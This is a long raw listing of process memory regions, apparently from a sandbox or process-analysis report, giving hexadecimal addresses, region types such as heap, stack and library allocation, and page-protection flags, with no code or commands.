218568F4000
|
heap
|
page read and write
|
||
3121000
|
trusted library allocation
|
page read and write
|
||
97F9C7E000
|
stack
|
page read and write
|
||
1E3B7850000
|
heap
|
page execute and read and write
|
||
209253D0000
|
heap
|
page read and write
|
||
2AEB6FC0000
|
heap
|
page readonly
|
||
2183E55D000
|
trusted library allocation
|
page read and write
|
||
7FF848CE0000
|
trusted library allocation
|
page read and write
|
||
1BDA6000
|
heap
|
page read and write
|
||
7FF848B30000
|
trusted library allocation
|
page read and write
|
||
5B551FD000
|
stack
|
page read and write
|
||
BB7897A000
|
stack
|
page read and write
|
||
3104000
|
trusted library allocation
|
page read and write
|
||
BB78C36000
|
stack
|
page read and write
|
||
21856C13000
|
heap
|
page read and write
|
||
209374E1000
|
trusted library allocation
|
page read and write
|
||
28004C3C000
|
heap
|
page read and write
|
||
2AED0E1B000
|
heap
|
page read and write
|
||
2341CDD4000
|
trusted library allocation
|
page read and write
|
||
7FF84888D000
|
trusted library allocation
|
page execute and read and write
|
||
2183E4D1000
|
trusted library allocation
|
page read and write
|
||
2183E308000
|
trusted library allocation
|
page read and write
|
||
7FF8488BB000
|
trusted library allocation
|
page execute and read and write
|
||
1C248000
|
stack
|
page read and write
|
||
1EC902F9000
|
trusted library allocation
|
page read and write
|
||
7FF848883000
|
trusted library allocation
|
page execute and read and write
|
||
2183C36D000
|
heap
|
page read and write
|
||
280087C8000
|
trusted library allocation
|
page read and write
|
||
2183E4D7000
|
trusted library allocation
|
page read and write
|
||
2AEC8A01000
|
trusted library allocation
|
page read and write
|
||
28016A01000
|
trusted library allocation
|
page read and write
|
||
2183E519000
|
trusted library allocation
|
page read and write
|
||
1C04E000
|
stack
|
page read and write
|
||
234355F7000
|
heap
|
page read and write
|
||
2AEB6FB0000
|
trusted library allocation
|
page read and write
|
||
7FF8489C0000
|
trusted library allocation
|
page execute and read and write
|
||
2AEB99A1000
|
trusted library allocation
|
page read and write
|
||
2183E07B000
|
heap
|
page read and write
|
||
1ECF1F10000
|
heap
|
page read and write
|
||
234353D9000
|
heap
|
page read and write
|
||
28006991000
|
heap
|
page read and write
|
||
8C616FD000
|
stack
|
page read and write
|
||
97FAA4C000
|
stack
|
page read and write
|
||
1E3B79E0000
|
heap
|
page execute and read and write
|
||
7FF848AF0000
|
trusted library allocation
|
page read and write
|
||
7FF848BD9000
|
trusted library allocation
|
page read and write
|
||
2341AF10000
|
trusted library allocation
|
page read and write
|
||
21856F80000
|
heap
|
page execute and read and write
|
||
28004E97000
|
heap
|
page execute and read and write
|
||
7FF848A40000
|
trusted library allocation
|
page read and write
|
||
2AEB9A9D000
|
trusted library allocation
|
page read and write
|
||
7FF848AED000
|
trusted library allocation
|
page read and write
|
||
21856AC4000
|
heap
|
page read and write
|
||
218569FB000
|
heap
|
page read and write
|
||
1E3D1AD0000
|
heap
|
page read and write
|
||
1E3B7658000
|
heap
|
page read and write
|
||
7FF848B40000
|
trusted library allocation
|
page read and write
|
||
7FF848A40000
|
trusted library allocation
|
page read and write
|
||
DE0000
|
unkown
|
page readonly
|
||
1ECF40BE000
|
heap
|
page read and write
|
||
1E3B94D8000
|
trusted library allocation
|
page read and write
|
||
2341CE91000
|
trusted library allocation
|
page read and write
|
||
7FF848BE5000
|
trusted library allocation
|
page read and write
|
||
28004CF7000
|
heap
|
page read and write
|
||
97F9A7E000
|
stack
|
page read and write
|
||
21856990000
|
heap
|
page read and write
|
||
2343528A000
|
heap
|
page read and write
|
||
7FF848C00000
|
trusted library allocation
|
page execute and read and write
|
||
2341AF72000
|
heap
|
page read and write
|
||
7FF84893C000
|
trusted library allocation
|
page execute and read and write
|
||
7FF848966000
|
trusted library allocation
|
page read and write
|
||
23435282000
|
heap
|
page read and write
|
||
2AEB7085000
|
heap
|
page read and write
|
||
A85ABE1000
|
stack
|
page read and write
|
||
2183E655000
|
trusted library allocation
|
page read and write
|
||
7FF848883000
|
trusted library allocation
|
page execute and read and write
|
||
7FF848AE0000
|
trusted library allocation
|
page read and write
|
||
7FF8488CA000
|
trusted library allocation
|
page read and write
|
||
7FF848A64000
|
trusted library allocation
|
page read and write
|
||
28004C08000
|
heap
|
page read and write
|
||
2183E367000
|
trusted library allocation
|
page read and write
|
||
28004C8D000
|
heap
|
page read and write
|
||
7DF40E1D0000
|
trusted library allocation
|
page execute and read and write
|
||
7DF40E1E0000
|
trusted library allocation
|
page execute and read and write
|
||
1CD6F000
|
stack
|
page read and write
|
||
7FF848BF0000
|
trusted library allocation
|
page read and write
|
||
280075D3000
|
trusted library allocation
|
page read and write
|
||
7FF8488C2000
|
trusted library allocation
|
page read and write
|
||
1263000
|
trusted library allocation
|
page read and write
|
||
2183E763000
|
trusted library allocation
|
page read and write
|
||
8C6177E000
|
stack
|
page read and write
|
||
2184EACD000
|
trusted library allocation
|
page read and write
|
||
7FF848B50000
|
trusted library allocation
|
page read and write
|
||
280076F1000
|
trusted library allocation
|
page read and write
|
||
218569C5000
|
heap
|
page read and write
|
||
7FF848930000
|
trusted library allocation
|
page read and write
|
||
2183E2DA000
|
trusted library allocation
|
page read and write
|
||
2183E2CD000
|
trusted library allocation
|
page read and write
|
||
1ECF1FB0000
|
heap
|
page read and write
|
||
7FF848B30000
|
trusted library allocation
|
page read and write
|
||
2AEB9BE2000
|
trusted library allocation
|
page read and write
|
||
8C6284C000
|
stack
|
page read and write
|
||
2343571B000
|
heap
|
page read and write
|
||
2341CEA4000
|
trusted library allocation
|
page read and write
|
||
97F9AF8000
|
stack
|
page read and write
|
||
8C6197B000
|
stack
|
page read and write
|
||
2AEB9D10000
|
trusted library allocation
|
page read and write
|
||
7FF848A90000
|
trusted library allocation
|
page read and write
|
||
2801EFA7000
|
heap
|
page read and write
|
||
2341CDE2000
|
trusted library allocation
|
page read and write
|
||
97F9E7B000
|
stack
|
page read and write
|
||
2800827A000
|
trusted library allocation
|
page read and write
|
||
2183E505000
|
trusted library allocation
|
page read and write
|
||
2183E6C1000
|
trusted library allocation
|
page read and write
|
||
2183E48C000
|
trusted library allocation
|
page read and write
|
||
7FF848AB8000
|
trusted library allocation
|
page read and write
|
||
7FF84890C000
|
trusted library allocation
|
page execute and read and write
|
||
234356D6000
|
heap
|
page read and write
|
||
2341CEAA000
|
trusted library allocation
|
page read and write
|
||
7FF848986000
|
trusted library allocation
|
page execute and read and write
|
||
1BE27000
|
heap
|
page read and write
|
||
7FF8488A4000
|
trusted library allocation
|
page read and write
|
||
7FF848CF0000
|
trusted library allocation
|
page read and write
|
||
2183E11A000
|
heap
|
page read and write
|
||
2800880D000
|
trusted library allocation
|
page read and write
|
||
A85C3FF000
|
stack
|
page read and write
|
||
2AEB6DF0000
|
heap
|
page read and write
|
||
7FF848AB0000
|
trusted library allocation
|
page read and write
|
||
7FF84889D000
|
trusted library allocation
|
page execute and read and write
|
||
7FF848966000
|
trusted library allocation
|
page execute and read and write
|
||
7FF8488A0000
|
trusted library allocation
|
page read and write
|
||
7FF848A70000
|
trusted library allocation
|
page execute and read and write
|
||
FC0000
|
heap
|
page read and write
|
||
BB79B8E000
|
stack
|
page read and write
|
||
28004F55000
|
heap
|
page read and write
|
||
1EC8186D000
|
trusted library allocation
|
page read and write
|
||
7FF848B80000
|
trusted library allocation
|
page read and write
|
||
7FF848AA0000
|
trusted library allocation
|
page read and write
|
||
2183E37A000
|
trusted library allocation
|
page read and write
|
||
21856BF7000
|
heap
|
page read and write
|
||
7FF848AE8000
|
trusted library allocation
|
page read and write
|
||
2800795B000
|
trusted library allocation
|
page read and write
|
||
7FF848A70000
|
trusted library allocation
|
page read and write
|
||
21F4BFF000
|
stack
|
page read and write
|
||
20936FE3000
|
trusted library allocation
|
page read and write
|
||
2341CC26000
|
trusted library allocation
|
page read and write
|
||
2183C2C0000
|
heap
|
page read and write
|
||
1ECF3CD0000
|
heap
|
page execute and read and write
|
||
7FF848AD6000
|
trusted library allocation
|
page read and write
|
||
7FF8488BD000
|
trusted library allocation
|
page execute and read and write
|
||
2341CC7E000
|
trusted library allocation
|
page read and write
|
||
1ECF1F50000
|
heap
|
page read and write
|
||
7FF848A5E000
|
trusted library allocation
|
page read and write
|
||
7FF848AF0000
|
trusted library allocation
|
page read and write
|
||
2801EFB3000
|
heap
|
page read and write
|
||
2183C6BE000
|
heap
|
page read and write
|
||
2183E5B4000
|
trusted library allocation
|
page read and write
|
||
1ECF3BE8000
|
heap
|
page read and write
|
||
2800833B000
|
trusted library allocation
|
page read and write
|
||
97FA8CC000
|
stack
|
page read and write
|
||
2183C2C6000
|
heap
|
page read and write
|
||
2341AEB0000
|
heap
|
page read and write
|
||
CDD0BFF000
|
stack
|
page read and write
|
||
23435290000
|
heap
|
page read and write
|
||
F90000
|
heap
|
page read and write
|
||
7FF848CC0000
|
trusted library allocation
|
page read and write
|
||
2183C200000
|
heap
|
page read and write
|
||
28007CEB000
|
trusted library allocation
|
page read and write
|
||
7FF446DD0000
|
trusted library allocation
|
page execute and read and write
|
||
2801EE30000
|
heap
|
page read and write
|
||
7FF848B10000
|
trusted library allocation
|
page read and write
|
||
1ECF4419000
|
heap
|
page read and write
|
||
20925148000
|
heap
|
page read and write
|
||
7FF8488BD000
|
trusted library allocation
|
page execute and read and write
|
||
21856A7B000
|
heap
|
page read and write
|
||
7FF848B30000
|
trusted library allocation
|
page read and write
|
||
2AED0D40000
|
heap
|
page read and write
|
||
8C61A79000
|
stack
|
page read and write
|
||
1E3C94AB000
|
trusted library allocation
|
page read and write
|
||
28016CE9000
|
trusted library allocation
|
page read and write
|
||
1275000
|
heap
|
page read and write
|
||
7FF848A50000
|
trusted library allocation
|
page execute and read and write
|
||
2341AF5E000
|
heap
|
page read and write
|
||
7FF8488CD000
|
trusted library allocation
|
page execute and read and write
|
||
97F952E000
|
stack
|
page read and write
|
||
23435594000
|
heap
|
page read and write
|
||
234354C0000
|
heap
|
page read and write
|
||
7FF848CC0000
|
trusted library allocation
|
page read and write
|
||
1E3B7A55000
|
heap
|
page read and write
|
||
5B565FC000
|
stack
|
page read and write
|
||
21856A13000
|
heap
|
page read and write
|
||
1E3B93E2000
|
trusted library allocation
|
page read and write
|
||
7FF8488C0000
|
trusted library allocation
|
page read and write
|
||
2341CC8C000
|
trusted library allocation
|
page read and write
|
||
7FF848A67000
|
trusted library allocation
|
page read and write
|
||
7FF8488DC000
|
trusted library allocation
|
page execute and read and write
|
||
97F9D79000
|
stack
|
page read and write
|
||
CDD0FFE000
|
stack
|
page read and write
|
||
7FF848BEA000
|
trusted library allocation
|
page read and write
|
||
7FF848BD0000
|
trusted library allocation
|
page read and write
|
||
7FF848946000
|
trusted library allocation
|
page read and write
|
||
2341AE70000
|
heap
|
page read and write
|
||
28016D60000
|
trusted library allocation
|
page read and write
|
||
2183E771000
|
trusted library allocation
|
page read and write
|
||
1EC80C05000
|
trusted library allocation
|
page read and write
|
||
1E3D1B7F000
|
heap
|
page read and write
|
||
2183E7D4000
|
trusted library allocation
|
page read and write
|
||
21856888000
|
heap
|
page read and write
|
||
1EC813CB000
|
trusted library allocation
|
page read and write
|
||
1E3C94C3000
|
trusted library allocation
|
page read and write
|
||
2AEB9DC9000
|
trusted library allocation
|
page read and write
|
||
2341CD1F000
|
trusted library allocation
|
page read and write
|
||
1ECF4320000
|
heap
|
page read and write
|
||
1BAA0000
|
heap
|
page read and write
|
||
280068B0000
|
heap
|
page read and write
|
||
97FA84E000
|
stack
|
page read and write
|
||
23435562000
|
heap
|
page read and write
|
||
2183E6ED000
|
trusted library allocation
|
page read and write
|
||
2AED1210000
|
trusted library allocation
|
page read and write
|
||
7FF848A50000
|
trusted library allocation
|
page execute and read and write
|
||
1CC6D000
|
stack
|
page read and write
|
||
2183E7BB000
|
trusted library allocation
|
page read and write
|
||
28004BB0000
|
heap
|
page read and write
|
||
23435726000
|
heap
|
page read and write
|
||
2183E0CA000
|
heap
|
page read and write
|
||
5B55DFE000
|
stack
|
page read and write
|
||
21856C26000
|
heap
|
page read and write
|
||
2801EF28000
|
heap
|
page read and write
|
||
2183E2F5000
|
trusted library allocation
|
page read and write
|
||
1600000
|
heap
|
page read and write
|
||
2183E6E1000
|
trusted library allocation
|
page read and write
|
||
7FF848A68000
|
trusted library allocation
|
page read and write
|
||
28004E00000
|
trusted library allocation
|
page read and write
|
||
12A0000
|
heap
|
page read and write
|
||
20936E84000
|
trusted library allocation
|
page read and write
|
||
7FF8488DC000
|
trusted library allocation
|
page execute and read and write
|
||
7FF848C7C000
|
trusted library allocation
|
page read and write
|
||
7FF848AC0000
|
trusted library allocation
|
page read and write
|
||
5B54DFE000
|
stack
|
page read and write
|
||
7FF848ACF000
|
trusted library allocation
|
page read and write
|
||
7FF848960000
|
trusted library allocation
|
page execute and read and write
|
||
2341CF1F000
|
trusted library allocation
|
page read and write
|
||
28004EF0000
|
heap
|
page read and write
|
||
2183E040000
|
heap
|
page read and write
|
||
2AED0FF0000
|
heap
|
page read and write
|
||
7FF8488DD000
|
trusted library allocation
|
page execute and read and write
|
||
23435270000
|
heap
|
page read and write
|
||
2184E266000
|
trusted library allocation
|
page read and write
|
||
28006986000
|
heap
|
page read and write
|
||
7FF848AC8000
|
trusted library allocation
|
page read and write
|
||
30D8000
|
trusted library allocation
|
page read and write
|
||
234353C0000
|
heap
|
page read and write
|
||
7FF8489B0000
|
trusted library allocation
|
page execute and read and write
|
||
234354F4000
|
heap
|
page read and write
|
||
2183E6E7000
|
trusted library allocation
|
page read and write
|
||
23435360000
|
trusted library section
|
page read and write
|
||
7FF848B50000
|
trusted library allocation
|
page execute and read and write
|
||
7FF848AC0000
|
trusted library allocation
|
page read and write
|
||
2183E5FE000
|
trusted library allocation
|
page read and write
|
||
20937261000
|
trusted library allocation
|
page read and write
|
||
7FF848B32000
|
trusted library allocation
|
page read and write
|
||
130E000
|
heap
|
page read and write
|
||
2341CA96000
|
trusted library allocation
|
page read and write
|
||
1ECF3BA6000
|
heap
|
page execute and read and write
|
||
7FF848AC6000
|
trusted library allocation
|
page read and write
|
||
7FF848BEC000
|
trusted library allocation
|
page read and write
|
||
7FF848C70000
|
trusted library allocation
|
page read and write
|
||
28006830000
|
heap
|
page read and write
|
||
20925130000
|
trusted library allocation
|
page read and write
|
||
A85BFFF000
|
stack
|
page read and write
|
||
7FF848AB0000
|
trusted library allocation
|
page read and write
|
||
218568EE000
|
heap
|
page read and write
|
||
7FF848A70000
|
trusted library allocation
|
page execute and read and write
|
||
7FF848A3A000
|
trusted library allocation
|
page read and write
|
||
2184E643000
|
trusted library allocation
|
page read and write
|
||
20925205000
|
heap
|
page read and write
|
||
7FF848AFA000
|
trusted library allocation
|
page read and write
|
||
2AED0D7F000
|
heap
|
page read and write
|
||
7FF848B10000
|
trusted library allocation
|
page read and write
|
||
234352C4000
|
heap
|
page read and write
|
||
1ECF42E0000
|
heap
|
page read and write
|
||
7FF8488B0000
|
trusted library allocation
|
page read and write
|
||
1E3B7833000
|
trusted library allocation
|
page read and write
|
||
7FF848A40000
|
trusted library allocation
|
page read and write
|
||
7FF848B34000
|
trusted library allocation
|
page read and write
|
||
7FF848BE8000
|
trusted library allocation
|
page read and write
|
||
7DF40E1C0000
|
trusted library allocation
|
page execute and read and write
|
||
2342C991000
|
trusted library allocation
|
page read and write
|
||
23435548000
|
heap
|
page read and write
|
||
7FF848884000
|
trusted library allocation
|
page read and write
|
||
BB7887E000
|
stack
|
page read and write
|
||
2184E543000
|
trusted library allocation
|
page read and write
|
||
1E3D1200000
|
trusted library allocation
|
page read and write
|
||
7FF8488D0000
|
trusted library allocation
|
page read and write
|
||
2AEC8D0B000
|
trusted library allocation
|
page read and write
|
||
7FF848CD0000
|
trusted library allocation
|
page read and write
|
||
7FF8488A2000
|
trusted library allocation
|
page read and write
|
||
1ECF2090000
|
trusted library allocation
|
page read and write
|
||
7FF848C7A000
|
trusted library allocation
|
page read and write
|
||
1E3D1B90000
|
heap
|
page read and write
|
||
2183E0B6000
|
heap
|
page read and write
|
||
7FF8488BD000
|
trusted library allocation
|
page execute and read and write
|
||
7FF8489A0000
|
trusted library allocation
|
page execute and read and write
|
||
7FF848956000
|
trusted library allocation
|
page read and write
|
||
20936F83000
|
trusted library allocation
|
page read and write
|
||
7FF848A90000
|
trusted library allocation
|
page read and write
|
||
1ECF3B05000
|
heap
|
page read and write
|
||
5B555FE000
|
stack
|
page read and write
|
||
7FF848BB3000
|
trusted library allocation
|
page read and write
|
||
21F57FF000
|
stack
|
page read and write
|
||
1ECF398D000
|
heap
|
page read and write
|
||
23435579000
|
heap
|
page read and write
|
||
2341CB3D000
|
trusted library allocation
|
page read and write
|
||
97F987F000
|
stack
|
page read and write
|
||
20936D86000
|
trusted library allocation
|
page read and write
|
||
2800794A000
|
trusted library allocation
|
page read and write
|
||
7FF848B60000
|
trusted library allocation
|
page read and write
|
||
7FF848AB4000
|
trusted library allocation
|
page read and write
|
||
1EC81169000
|
trusted library allocation
|
page read and write
|
||
7FF848CF0000
|
trusted library allocation
|
page read and write
|
||
2183E743000
|
trusted library allocation
|
page read and write
|
||
23435580000
|
heap
|
page read and write
|
||
97F997F000
|
stack
|
page read and write
|
||
23435509000
|
heap
|
page read and write
|
||
7FF8489D0000
|
trusted library allocation
|
page execute and read and write
|
||
BB78B79000
|
stack
|
page read and write
|
||
2343551B000
|
heap
|
page read and write
|
||
2341CF19000
|
trusted library allocation
|
page read and write
|
||
2341CE2B000
|
trusted library allocation
|
page read and write
|
||
7FF848A5C000
|
trusted library allocation
|
page read and write
|
||
7FF848AD0000
|
trusted library allocation
|
page read and write
|
||
2183E6FF000
|
trusted library allocation
|
page read and write
|
||
2183E06B000
|
heap
|
page read and write
|
||
1ECF447A000
|
heap
|
page read and write
|
||
7FF848966000
|
trusted library allocation
|
page execute and read and write
|
||
2341AF25000
|
heap
|
page read and write
|
||
2343543E000
|
heap
|
page read and write
|
||
1EC8138D000
|
trusted library allocation
|
page read and write
|
||
28007A76000
|
trusted library allocation
|
page read and write
|
||
2AEC8A73000
|
trusted library allocation
|
page read and write
|
||
1ECF1FFC000
|
heap
|
page read and write
|
||
234352DE000
|
heap
|
page read and write
|
||
7FF848A80000
|
trusted library allocation
|
page read and write
|
||
28004BD0000
|
trusted library section
|
page read and write
|
||
2341CBEC000
|
trusted library allocation
|
page read and write
|
||
BB78573000
|
stack
|
page read and write
|
||
2341CBD2000
|
trusted library allocation
|
page read and write
|
||
8C61673000
|
stack
|
page read and write
|
||
28004C49000
|
heap
|
page read and write
|
||
1EC81009000
|
trusted library allocation
|
page read and write
|
||
21856886000
|
heap
|
page read and write
|
||
7FF848996000
|
trusted library allocation
|
page execute and read and write
|
||
2341B026000
|
heap
|
page read and write
|
||
1ECF4311000
|
heap
|
page read and write
|
||
3060000
|
heap
|
page execute and read and write
|
||
23435568000
|
heap
|
page read and write
|
||
23435730000
|
heap
|
page read and write
|
||
1ECF4405000
|
heap
|
page read and write
|
||
8C628CE000
|
stack
|
page read and write
|
||
21856B12000
|
heap
|
page read and write
|
||
7FF848B52000
|
trusted library allocation
|
page read and write
|
||
20924FC0000
|
heap
|
page read and write
|
||
1250000
|
trusted library allocation
|
page read and write
|
||
2341CE9E000
|
trusted library allocation
|
page read and write
|
||
28004E90000
|
heap
|
page execute and read and write
|
||
1ECF3C4D000
|
heap
|
page read and write
|
||
7FF848890000
|
trusted library allocation
|
page read and write
|
||
7FF848B00000
|
trusted library allocation
|
page read and write
|
||
1E3D1F00000
|
heap
|
page read and write
|
||
2AEB6FD0000
|
trusted library allocation
|
page read and write
|
||
1EC81955000
|
trusted library allocation
|
page read and write
|
||
2341CEB0000
|
trusted library allocation
|
page read and write
|
||
2343558D000
|
heap
|
page read and write
|
||
2341CC6F000
|
trusted library allocation
|
page read and write
|
||
7FF848A40000
|
trusted library allocation
|
page execute and read and write
|
||
1ECF3B0A000
|
heap
|
page read and write
|
||
1B5FD000
|
stack
|
page read and write
|
||
2AEB9452000
|
trusted library allocation
|
page read and write
|
||
5B541E1000
|
stack
|
page read and write
|
||
2184E971000
|
trusted library allocation
|
page read and write
|
||
7FF848AA0000
|
trusted library allocation
|
page read and write
|
||
1E3B7853000
|
heap
|
page execute and read and write
|
||
2AEBA26D000
|
trusted library allocation
|
page read and write
|
||
7FF848CB0000
|
trusted library allocation
|
page execute and read and write
|
||
30CF000
|
trusted library allocation
|
page read and write
|
||
218569A1000
|
heap
|
page read and write
|
||
28007956000
|
trusted library allocation
|
page read and write
|
||
20937526000
|
trusted library allocation
|
page read and write
|
||
20925165000
|
heap
|
page read and write
|
||
20925575000
|
heap
|
page read and write
|
||
1E3B766B000
|
heap
|
page read and write
|
||
7FF848C90000
|
trusted library allocation
|
page read and write
|
||
7FF848C10000
|
trusted library allocation
|
page read and write
|
||
7FF848A94000
|
trusted library allocation
|
page read and write
|
||
7FF848A94000
|
trusted library allocation
|
page read and write
|
||
2183E10E000
|
heap
|
page read and write
|
||
1EC90073000
|
trusted library allocation
|
page read and write
|
||
2343576B000
|
heap
|
page read and write
|
||
2184EA06000
|
trusted library allocation
|
page read and write
|
||
7FF848C10000
|
trusted library allocation
|
page read and write
|
||
28004BF0000
|
trusted library allocation
|
page read and write
|
||
28007952000
|
trusted library allocation
|
page read and write
|
||
2341CFC7000
|
trusted library allocation
|
page read and write
|
||
7FF8488B4000
|
trusted library allocation
|
page read and write
|
||
2183E34D000
|
trusted library allocation
|
page read and write
|
||
2AEBA82C000
|
trusted library allocation
|
page read and write
|
||
28004E30000
|
trusted library allocation
|
page read and write
|
||
2AEBA827000
|
trusted library allocation
|
page read and write
|
||
1ECF42F0000
|
heap
|
page read and write
|
||
97F94A3000
|
stack
|
page read and write
|
||
2184EA2E000
|
trusted library allocation
|
page read and write
|
||
2AED109A000
|
heap
|
page read and write
|
||
7FF848C90000
|
trusted library allocation
|
page read and write
|
||
2183E0A7000
|
heap
|
page read and write
|
||
2183E5D4000
|
trusted library allocation
|
page read and write
|
||
2FDE000
|
stack
|
page read and write
|
||
1ECF1FF7000
|
heap
|
page read and write
|
||
2AEB6E3B000
|
heap
|
page read and write
|
||
7FF848BE8000
|
trusted library allocation
|
page read and write
|
||
7FF848B80000
|
trusted library allocation
|
page read and write
|
||
21F43E1000
|
stack
|
page read and write
|
||
28006C09000
|
trusted library allocation
|
page read and write
|
||
1CB6E000
|
stack
|
page read and write
|
||
7FF848AB0000
|
trusted library allocation
|
page read and write
|
||
2183E30F000
|
trusted library allocation
|
page read and write
|
||
280069B0000
|
heap
|
page execute and read and write
|
||
1EC80A52000
|
trusted library allocation
|
page read and write
|
||
2341AC40000
|
unkown
|
page readonly
|
||
7FF84889B000
|
trusted library allocation
|
page read and write
|
||
1EC80C29000
|
trusted library allocation
|
page read and write
|
||
7FF84893C000
|
trusted library allocation
|
page execute and read and write
|
||
23435308000
|
heap
|
page read and write
|
||
2801F050000
|
trusted library allocation
|
page read and write
|
||
7FF848AE6000
|
trusted library allocation
|
page read and write
|
||
3100000
|
trusted library allocation
|
page read and write
|
||
2341C8F0000
|
trusted library section
|
page read and write
|
||
1E3C9A46000
|
trusted library allocation
|
page read and write
|
||
1E3B78E5000
|
heap
|
page read and write
|
||
1EC90021000
|
trusted library allocation
|
page read and write
|
||
2183E64E000
|
trusted library allocation
|
page read and write
|
||
2800795F000
|
trusted library allocation
|
page read and write
|
||
1E3C9989000
|
trusted library allocation
|
page read and write
|
||
234352D0000
|
heap
|
page read and write
|
||
7FF848B40000
|
trusted library allocation
|
page read and write
|
||
7FF8488B0000
|
trusted library allocation
|
page read and write
|
||
2AEB8ECE000
|
trusted library allocation
|
page read and write
|
||
23435260000
|
heap
|
page read and write
|
||
2801EE54000
|
heap
|
page read and write
|
||
7FF848AD0000
|
trusted library allocation
|
page read and write
|
||
21856C46000
|
heap
|
page read and write
|
||
2341CCA7000
|
trusted library allocation
|
page read and write
|
||
7FF848BA0000
|
trusted library allocation
|
page read and write
|
||
7FF848A52000
|
trusted library allocation
|
page read and write
|
||
8C61D7E000
|
stack
|
page read and write
|
||
7FF848AF1000
|
trusted library allocation
|
page read and write
|
||
7FF848B40000
|
trusted library allocation
|
page read and write
|
||
7FF848A90000
|
trusted library allocation
|
page execute and read and write
|
||
234353DD000
|
heap
|
page read and write
|
||
7DF44C740000
|
trusted library allocation
|
page execute and read and write
|
||
234352A6000
|
heap
|
page read and write
|
||
2801EFCD000
|
heap
|
page read and write
|
||
2341CC33000
|
trusted library allocation
|
page read and write
|
||
21856B72000
|
heap
|
page read and write
|
||
7FF848CC0000
|
trusted library allocation
|
page read and write
|
||
7FF848AE0000
|
trusted library allocation
|
page read and write
|
||
7FF84889B000
|
trusted library allocation
|
page read and write
|
||
7FF848B40000
|
trusted library allocation
|
page read and write
|
||
12DF000
|
heap
|
page read and write
|
||
2183E499000
|
trusted library allocation
|
page read and write
|
||
7FF848AB0000
|
trusted library allocation
|
page read and write
|
||
2801EE5C000
|
heap
|
page read and write
|
||
2341CD84000
|
trusted library allocation
|
page read and write
|
||
7FF848CD0000
|
trusted library allocation
|
page read and write
|
||
7FF8488A4000
|
trusted library allocation
|
page read and write
|
||
209253D5000
|
heap
|
page read and write
|
||
21F53FD000
|
stack
|
page read and write
|
||
2341CECF000
|
trusted library allocation
|
page read and write
|
||
234353FF000
|
heap
|
page read and write
|
||
2341CD8A000
|
trusted library allocation
|
page read and write
|
||
2341CF97000
|
trusted library allocation
|
page read and write
|
||
21F47FF000
|
stack
|
page read and write
|
||
1ECF4473000
|
heap
|
page read and write
|
||
2341CACB000
|
trusted library allocation
|
page read and write
|
||
1ECF1FB9000
|
heap
|
page read and write
|
||
2AED113D000
|
heap
|
page read and write
|
||
BB78AFD000
|
stack
|
page read and write
|
||
7FF848A62000
|
trusted library allocation
|
page read and write
|
||
2341CAFA000
|
trusted library allocation
|
page read and write
|
||
7FF848AD6000
|
trusted library allocation
|
page read and write
|
||
1E3B7590000
|
heap
|
page read and write
|
||
2341AC42000
|
unkown
|
page readonly
|
||
2AEB9607000
|
trusted library allocation
|
page read and write
|
||
2AEBA355000
|
trusted library allocation
|
page read and write
|
||
1ECF3B00000
|
heap
|
page read and write
|
||
2343553B000
|
heap
|
page read and write
|
||
28007996000
|
trusted library allocation
|
page read and write
|
||
1EC8130F000
|
trusted library allocation
|
page read and write
|
||
1C96B000
|
stack
|
page read and write
|
||
28007BBE000
|
trusted library allocation
|
page read and write
|
||
218569AD000
|
heap
|
page read and write
|
||
7FF848C20000
|
trusted library allocation
|
page read and write
|
||
7FF848A68000
|
trusted library allocation
|
page read and write
|
||
7FF848A70000
|
trusted library allocation
|
page read and write
|
||
2341AEF0000
|
trusted library allocation
|
page read and write
|
||
7FF848890000
|
trusted library allocation
|
page read and write
|
||
218568AF000
|
heap
|
page read and write
|
||
7FF848CDD000
|
trusted library allocation
|
page read and write
|
||
280087ED000
|
trusted library allocation
|
page read and write
|
||
2183E6B4000
|
trusted library allocation
|
page read and write
|
||
1D36E000
|
stack
|
page read and write
|
||
7FF848AE0000
|
trusted library allocation
|
page read and write
|
||
2341CCD5000
|
trusted library allocation
|
page read and write
|
||
1D268000
|
stack
|
page read and write
|
||
21856A1C000
|
heap
|
page read and write
|
||
2341CB5D000
|
trusted library allocation
|
page read and write
|
||
7FF848B00000
|
trusted library allocation
|
page read and write
|
||
5B53BFE000
|
stack
|
page read and write
|
||
7FF848884000
|
trusted library allocation
|
page read and write
|
||
7FF848A5E000
|
trusted library allocation
|
page read and write
|
||
CDD07FC000
|
stack
|
page read and write
|
||
2341CE3F000
|
trusted library allocation
|
page read and write
|
||
21F5BFE000
|
stack
|
page read and write
|
||
1C543000
|
stack
|
page read and write
|
||
2800827F000
|
trusted library allocation
|
page read and write
|
||
7FF848930000
|
trusted library allocation
|
page read and write
|
||
7FF848C10000
|
trusted library allocation
|
page read and write
|
||
97F99F7000
|
stack
|
page read and write
|
||
28007B08000
|
trusted library allocation
|
page read and write
|
||
2AEB6F80000
|
trusted library section
|
page read and write
|
||
7FF848976000
|
trusted library allocation
|
page execute and read and write
|
||
20936CE1000
|
trusted library allocation
|
page read and write
|
||
7FF848AF0000
|
trusted library allocation
|
page read and write
|
||
1EC811E0000
|
trusted library allocation
|
page read and write
|
||
2341CE54000
|
trusted library allocation
|
page read and write
|
||
7FF848CA6000
|
trusted library allocation
|
page read and write
|
||
7FF84889D000
|
trusted library allocation
|
page execute and read and write
|
||
2AED115C000
|
heap
|
page read and write
|
||
2AEB6E2F000
|
heap
|
page read and write
|
||
21856A17000
|
heap
|
page read and write
|
||
7FF848AD4000
|
trusted library allocation
|
page read and write
|
||
2AED1350000
|
heap
|
page read and write
|
||
7FF848AA8000
|
trusted library allocation
|
page read and write
|
||
7FF8489F5000
|
trusted library allocation
|
page execute and read and write
|
||
8C61BFA000
|
stack
|
page read and write
|
||
2183C32B000
|
heap
|
page read and write
|
||
1CA6D000
|
stack
|
page read and write
|
||
1ECF2120000
|
trusted library allocation
|
page read and write
|
||
7FF8488FC000
|
trusted library allocation
|
page execute and read and write
|
||
1EC8007C000
|
trusted library allocation
|
page read and write
|
||
7FF848A22000
|
trusted library allocation
|
page read and write
|
||
2AEB977B000
|
trusted library allocation
|
page read and write
|
||
5B53BBE000
|
stack
|
page read and write
|
||
23435501000
|
heap
|
page read and write
|
||
23435426000
|
heap
|
page read and write
|
||
2183E7F0000
|
trusted library allocation
|
page read and write
|
||
2AEC8CF9000
|
trusted library allocation
|
page read and write
|
||
2184E741000
|
trusted library allocation
|
page read and write
|
||
2343533D000
|
heap
|
page read and write
|
||
7FF848940000
|
trusted library allocation
|
page read and write
|
||
1E3B78B0000
|
heap
|
page execute and read and write
|
||
7FF848AE0000
|
trusted library allocation
|
page read and write
|
||
7FF848AF6000
|
trusted library allocation
|
page read and write
|
||
